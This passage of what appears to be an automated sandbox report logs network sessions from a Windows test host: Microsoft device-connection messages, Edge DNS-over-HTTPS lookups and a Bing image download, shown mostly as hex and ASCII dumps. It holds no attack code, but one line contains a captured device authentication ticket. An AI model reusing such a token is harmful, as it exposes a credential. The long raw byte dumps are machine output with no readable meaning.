                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 4e 30 72 57 72 7a 59 51 30 6d 61 41 6c 35 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 34 33 65 64 66 33 31 34 64 31 30 62 39 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gN0rWrzYQ0maAl5f.2Context: c143edf314d10b95<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 67 4e 30 72 57 72 7a 59 51 30 6d 61 41 6c 35 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 34 33 65 64 66 33 31 34 64 31 30 62 39 35 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: gN0rWrzYQ0maAl5f.3Context: c143edf314d10b95
                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4c 2b 6a 69 45 72 32 6f 61 30 6d 6d 2f 44 68 31 4b 76 6b 42 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: L+jiEr2oa0mm/Dh1KvkBGg.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  9192.168.2.649765172.64.41.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c399fa4344-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  10192.168.2.649764172.64.41.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c39a0f4380-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 09 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  11192.168.2.649766162.159.61.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c40cdc8c3f-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ed 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  12192.168.2.649735150.171.28.10443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC346OUTGET /th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 884075
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: F3215D4E244B43F58ACF8C3D973F0A2E Ref B: EWR30EDGE1417 Ref C: 2024-12-18T20:06:17Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:17 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a fa 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 33 36 3a 34 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                  Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:36:488
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC16384INData Raw: 16 a5 8d a9 d4 5e c5 11 c6 b4 c7 8b 65 4e 94 ff 00 92 85 2b 0a c5 54 5d 95 2c 75 2b c5 b2 99 52 31 f1 ad 3d 17 f7 35 0c 0d b3 e4 a7 f9 b4 00 f9 16 aa cf 05 5a 4a 24 8a 82 b9 4c d9 ed 92 88 fe 4a b1 3a d5 59 17 f8 eb 54 db 33 1d 3b d6 35 f2 d5 d9 e5 fe 0a af 3f f7 eb 68 45 a6 67 3d 51 9b 3a ec a8 fe e5 5a 9f e4 aa 7c d7 52 39 99 22 79 75 2c 75 04 6d b2 a7 b4 a2 5b 5c 23 b9 2c 9f 25 55 91 b7 d5 c9 16 a0 78 23 4a 88 97 2b 84 71 54 52 47 57 f6 54 12 2d 38 c8 39 4c f9 22 a5 f2 aa e3 ae fa 7c 91 7e e6 af 98 8b 19 ff 00 bc ab 11 ad 11 c5 b2 9d 1a ec a0 45 59 3f b9 4f b7 a9 76 c7 e7 53 bc ad 94 f9 95 80 24 5d 95 56 46 ab b3 c5 fb aa cb 9f e4 a7 1d 42 43 e7 6a ab 3f cf 52 6e f7 a8 de b6 33 91 9f 3c 52 54 7b 4d 5e 91 6a 39 22 df f7 2b 65 23 9d c4 ab 45 3a 9a f5 44
                                                                                                                                                                                                                  Data Ascii: ^eN+T],u+R1=5ZJ$LJ:YT3;5?hEg=Q:Z|R9"yu,um[\#,%Ux#J+qTRGWT-89L"|~EY?OvS$]VFBCj?Rn3<RT{M^j9"+e#E:D
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC16384INData Raw: ea 52 7f cf 49 59 dd be 5f e9 ff 00 5c eb ce cc 6b d9 2a 7d f7 3a 70 f4 db 7c c7 be fc 1a f8 91 e1 0d 13 c3 be 17 b2 f1 0f da fe c3 a5 68 b0 db dc fd 9a 1f fa 76 dc 9f 37 f0 30 67 b8 7f f7 ab d9 a3 6b 0b 88 63 bd d2 35 28 b5 1b 19 3f d5 dc c5 f2 3c 7b 93 7e d9 13 f8 1b 6b 57 c3 9a 6d 9d dc 5a 4d f6 af 6b 79 0f 99 1d 97 97 2c 7e 6e cf b4 26 cd 9b 7f 0a f5 7f 84 fe 36 d5 b4 fb 4b 6d 6f fd 64 11 db 7d 9f cc f3 7f 73 22 47 b1 16 29 13 aa 63 cb f9 5b f0 af 17 2d 7f 53 ab 3f 79 b8 49 dd af 36 76 62 9f b6 84 53 5a a5 63 e9 0e 68 e6 b3 fc 33 ab d8 6b ba 1c 7a a6 97 34 37 10 49 ff 00 3c be 7f 2d ff 00 bb 57 e7 68 ed ed 24 bd ba 9a 1b 7b 58 ff 00 d6 5c cb f7 23 af ac 53 8b 8f 32 7a 1e 4f 2b 4e cc 5e 69 27 9e 0b 4b 4b 9b db d9 a1 b7 b5 b7 8d e4 b9 b9 97 ee 46 8b f7
                                                                                                                                                                                                                  Data Ascii: RIY_\k*}:p|hv70gkc5(?<{~kWmZMky,~n&6Kmod}s"G)c[-S?yI6vbSZch3kz47I<-Wh${X\#S2zO+N^i'KKF
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 16 ec 9e 64 91 ac 1f 73 6b fd f7 7f ef 57 6e 27 11 51 cf db 4d 5a cb 5b 6c ed d7 cb f1 22 31 f7 1a 8f fc 31 f5 65 8d 8e 8d e0 ad 26 3f ed 49 ad 23 d4 b5 5d 5a 18 35 2b df 91 d2 3b db 94 de b1 b4 9f 7f c9 fe 04 ff 00 80 7f 7a b1 af 3c 49 75 a4 43 e2 8b e8 f4 e9 63 7d 1a 27 fb 6d 95 cc 5b 3e c9 2a 7c f2 ec 7f f6 e4 fd da 2f f1 ef 8d bf bd 5e 3d f1 53 e2 6f 8a 74 cd 0e 3f 08 47 e2 ab 4d 7a d7 5a 91 35 b9 2e 65 d9 73 71 fb c7 4b 8f de 33 2e d8 f6 79 5c 44 bf 77 d5 7e e5 73 9a df 8a 1f c4 be 21 d4 b5 09 f5 e9 a4 82 ce d9 35 38 e3 97 f7 c9 7f a9 45 6d e5 fe f7 63 6d f9 fc a6 e7 fd ca d7 19 98 55 9c 60 a9 27 14 bb 74 dd 13 46 8c 53 6e 47 ba f8 3b c5 1e 28 f1 5f 84 e4 d4 60 9b 4f d3 ae ac b5 68 64 8e 3b 99 76 7d a2 5d fe 65 c2 ff 00 b1 02 46 fb 55 1b 7b fc 9f 35
                                                                                                                                                                                                                  Data Ascii: dskWn'QMZ[l"11e&?I#]Z5+;z<IuCc}'m[>*|/^=Sot?GMzZ5.esqK3.y\Dw~s!58EmcmU`'tFSnG;(_`Ohd;v}]eFU{5
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 4b c2 5e 19 fe de 4d 1f fb 47 58 92 4f 2e e7 5a d5 e5 47 86 d1 f7 ff 00 a8 82 0d db 77 7f 9f 96 ad 7c 16 d2 2e f5 0d 5a 4f 17 fe e6 e2 48 ff 00 79 f6 9b ed 9f f2 d3 2d ff 00 00 fe ff 00 cb f7 56 b9 1d 56 d6 4f 15 fc 52 93 41 d3 ac e6 d4 74 ad 06 4f b3 f9 72 cb fe b1 d7 fd 66 f9 3d db bf f7 6b d1 b5 6f ec 2f 09 5d c7 a0 de f9 ba ac 11 c8 f2 6b f1 fc 9f e9 12 aa 23 24 7b 1b f8 55 96 3f 97 fe 03 fd ea b7 64 9c 89 4e ec c9 f8 a1 7d a4 de ea d6 30 69 f3 43 6f a1 e9 d2 79 96 d2 79 5f f1 f1 7b 27 ef 77 b7 fb 3f f2 dd 9f fe b9 a5 69 7c 21 f0 ff 00 88 6e 3c bd 3a 0b cf 2f 4d fb 34 d2 47 7b 2f fc b8 27 fc fc 2f fb ff 00 bc fb df 37 fe 3b 5e 77 a1 df 6e f0 f4 9e 21 d4 66 f3 27 93 ed fe 5c 72 cb fc 6d fe b2 4f 2d 78 f9 e4 68 a3 ff 00 b6 6d 5d e7 fc 24 77 7e 1c fb 4d
                                                                                                                                                                                                                  Data Ascii: K^MGXO.ZGw|.ZOHy-VVORAtOrf=ko/]k#${U?dN}0iCoyy_{'w?i|!n<:/M4G{/'/7;^wn!f'\rmO-xhm]$w~M
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 22 b7 83 46 8f cc d4 bf 7b ff 00 1e 89 56 ad 62 f3 6d 3c f4 87 f7 72 7f cb 3f 35 1f cb ff 00 7b 6f dd af 92 ed 75 ef 0d 6a 1e 5a 69 7a 95 dd bf db 6c 9e d2 ca da 58 9d 3f 7a a9 f7 e6 77 dd e6 47 bb f8 56 bd 07 e0 d7 8c e0 f0 97 db b5 4d 47 47 d2 7c 8b 8d f2 5e c9 a6 ea 1f 3c 97 1f f4 d5 3f bd fe fe da d2 9e 73 3e 7f de ab 44 87 82 49 7b ae ec f7 38 e0 92 29 b7 a7 fd fc af 34 f8 b1 f0 47 c0 9e 30 f3 35 47 87 fb 07 52 8e 47 bb b9 d4 b4 d8 93 f7 88 b0 ed d8 d1 fd df bd 1a 3f fd f7 fd ea d6 f0 c7 c5 6d 26 ef cb 93 5b d4 b4 fb 2b 59 24 48 e3 b9 f9 f6 7c df c5 e6 7d d5 5f f6 ab d1 27 82 4b 7b bd 9f ea e4 8e bd 2c 3e 2a 96 2a 9b 71 fb 99 cd 28 4a 9b 3f 3d b4 a8 24 d1 35 cb 18 35 4b cf b3 c7 27 ef 23 b9 b6 fb 9f 37 dd 6a e8 7c 5d 6d a2 c5 e3 78 fe d5 67 fb 8b 8d
                                                                                                                                                                                                                  Data Ascii: "F{Vbm<r?5{oujZizlX?zwGVMGG|^<?s>DI{8)4G05GRG?m&[+Y$H|}_'K{,>**q(J?=$55K'#7j|]mxg
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: d3 49 1b 93 df 41 71 0c 70 3c de 5d d4 9f f1 f3 27 fb 75 b1 e1 5d 0e 39 74 99 36 7f ac 92 44 fd e7 9a ff 00 e8 ef ff 00 d9 d7 3b e2 4b 18 2d e6 ff 00 45 fd e4 12 7f ab ff 00 e2 77 7f 7a a4 d2 b5 9d 4a d2 1b 9d 2e 09 be 7d 47 64 71 ff 00 03 ff 00 bb 5c 4e 32 94 7d c6 6c 9d 9f bc 53 f1 76 9f 1e 9f ab 49 6b 3c 3e 5c 91 c8 ff 00 bb ad 28 da fd 21 8e d5 3c 98 ed 64 8f cb 8f ec d1 22 7d ef f9 e9 fd fa c8 f1 1e a1 77 ad eb 92 5e c1 0c 31 c9 e6 7e f2 db ef fc f5 57 4d d5 75 29 7c c4 9b ca fe 0f 2f fe 99 bf f1 57 5a 84 dc 55 f7 46 3c d1 4d 90 6a b0 5f fd ae e6 cb fe 9a 7f df ba ab 3c f2 5d dd ec ba 9b cc f2 e3 f2 fc cf f9 e9 5a 3e 34 d4 2d 26 d3 ed ae ac a1 9a 3b af 9e 3b 99 7c dd e9 27 f7 6b 95 fb 4c ed fe b3 fe 59 c9 ff 00 2d 22 d9 5d 74 e3 78 dd 99 49 a4 cd 89
                                                                                                                                                                                                                  Data Ascii: IAqp<]'u]9t6D;K-EwzJ.}Gdq\N2}lSvIk<>\(!<d"}w^1~WMu)|/WZUF<Mj_<]Z>4-&;;|'kLY-"]txI
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16067INData Raw: d0 74 b9 a6 8e 0d 47 fd 23 52 b9 f2 9e 6b 9b 84 89 f7 7d 17 1f 70 61 51 3b b5 71 42 97 36 ac da f7 d9 91 78 67 c2 fa 96 b7 ff 00 12 8b df 12 5d de c9 27 fa 5e a5 65 6d bd 2c 6d ed d7 ef b4 ae bf 7f 6f f9 db 5d 7f 80 f4 cf 0d 59 43 fd b7 fd 8f 37 fc 4a a4 7f b1 47 17 c9 6d 23 ae c5 66 dc d8 df fe b7 e5 f9 95 69 be 20 b9 d1 74 fd 42 3d 06 d6 6f ec ed 37 ec df f1 e5 e6 be fd 4e 56 ff 00 9e 8f fd c5 dd f3 6e fb cd ed 4e f1 37 f6 ee ab e1 3d 37 c3 53 f8 c3 ed ba 3d c4 9f 6b fe c0 fb 23 cd 6d e6 c8 ef e5 79 ed 1f ef 2e 24 fd d3 b9 de df 2f 6a e9 e6 52 d2 23 d4 cb be d5 6c 35 8b bd 4b 57 d7 a1 86 e2 0f 9e 4b 2b 2b 6f dc c3 69 2e fd b0 b4 af b5 bc fc 2f 48 d1 b6 fb d6 e7 82 ec 6c 35 59 a3 f1 ad ee a5 34 97 57 17 af f6 db 2f b2 23 c3 e5 49 fc 7b b7 fe fd df e4 f9
                                                                                                                                                                                                                  Data Ascii: tG#Rk}paQ;qB6xg]'^em,mo]YC7JGm#fi tB=o7NVnN7=7S=k#my.$/jR#l5KWK++oi./Hl5Y4W/#I{
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: af 77 71 75 26 9b e5 e9 d6 f2 6c bc 89 25 92 4d f7 11 ab fc ad 04 59 67 7f 99 5b e6 ae b3 c2 f1 6b 5a a5 ad cc 7a ee 99 35 9e 8f 26 b5 61 79 7b 7a 25 44 8a de 5b a8 7c 98 d1 15 be 6f de 79 5f c1 ff 00 a0 d7 1d 58 da 77 8f 53 ae 9e cd 33 67 c3 3e 21 fb 25 df fc 22 1a 8f f6 7d c4 71 de a5 a6 9b ad 58 ea 09 fe 8e 9b de 6f dc f9 9b be fb 6f ff 00 be f1 54 3e 3b e9 93 f9 5f eb bc b8 fc c7 d4 e4 b6 8b f7 c9 f3 7e ef fe 01 b5 be f7 fb f5 3e 81 f1 13 c2 fa 26 b9 b1 34 1b 49 23 fb 6f da 3c cb 18 b7 be d6 4f 2f ec ff 00 bd fe 18 eb 4b c6 9a 9c 1a 9c 32 41 75 a3 c3 6f 69 1c 69 71 6d 1c b2 a7 93 1b c9 fe b1 24 f9 b7 7c db ff 00 ca d7 24 5d aa 27 6b 22 a7 b9 e2 76 ab 25 c5 a6 fb 2b 3f f8 f7 8f f7 91 db 45 bf e4 fe 27 6a a7 a9 45 25 dd a4 77 50 fe f2 38 f7 c7 25 b5 5c
                                                                                                                                                                                                                  Data Ascii: wqu&l%MYg[kZz5&ay{z%D[|oy_XwS3g>!%"}qXooT>;_~>&4I#o<O/K2Auoiiqm$|$]'k"v%+?E'jE%wP8%\
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 46 8f 67 f6 7f dd ff 00 ab b6 ff 00 96 8f ff 00 3d 1b fb d5 34 a9 36 f9 a4 b7 1c a7 6d 11 9d e3 19 fe d7 ad ff 00 a2 f9 d2 79 7f bb b6 fe ff 00 95 fc 34 30 9f 4c d3 e2 d4 6d a5 b5 91 fc cd 9e 64 5f 3e c6 64 fb ad 5b 7a 56 8b 68 b0 c9 fe a7 cc b8 8f fe 5a ff 00 b5 51 5a db 40 f7 7f d9 70 69 bf 68 92 4d fe 5c 7f f3 d3 f8 ab a9 54 5b 18 f2 bb 9c fc 93 c9 71 17 9f 24 32 fe f2 4f f5 92 7f b3 57 2c 7c 89 ad 3c 99 21 f9 3f e5 9f ee ab 67 c4 7a 42 45 a4 d8 fd 97 ec 9e 47 98 f1 c7 ff 00 3d a3 fe f5 60 cf 2f 95 a8 47 b3 fd 5c 9f bb f2 ff 00 f1 da 39 94 96 83 69 c5 97 e3 f3 12 1f 22 78 7c b9 3c c7 ff 00 5b f7 eb 53 4d 5d 26 58 6e 7f e7 a4 76 df f2 d7 fe 7a af df f4 f9 6b 3b 51 5b 4f ec 9f 25 2f 26 92 79 3f d2 3c cf e0 8f fd 86 fa 56 57 d8 e7 97 49 fb 6a 4d f2 47 27
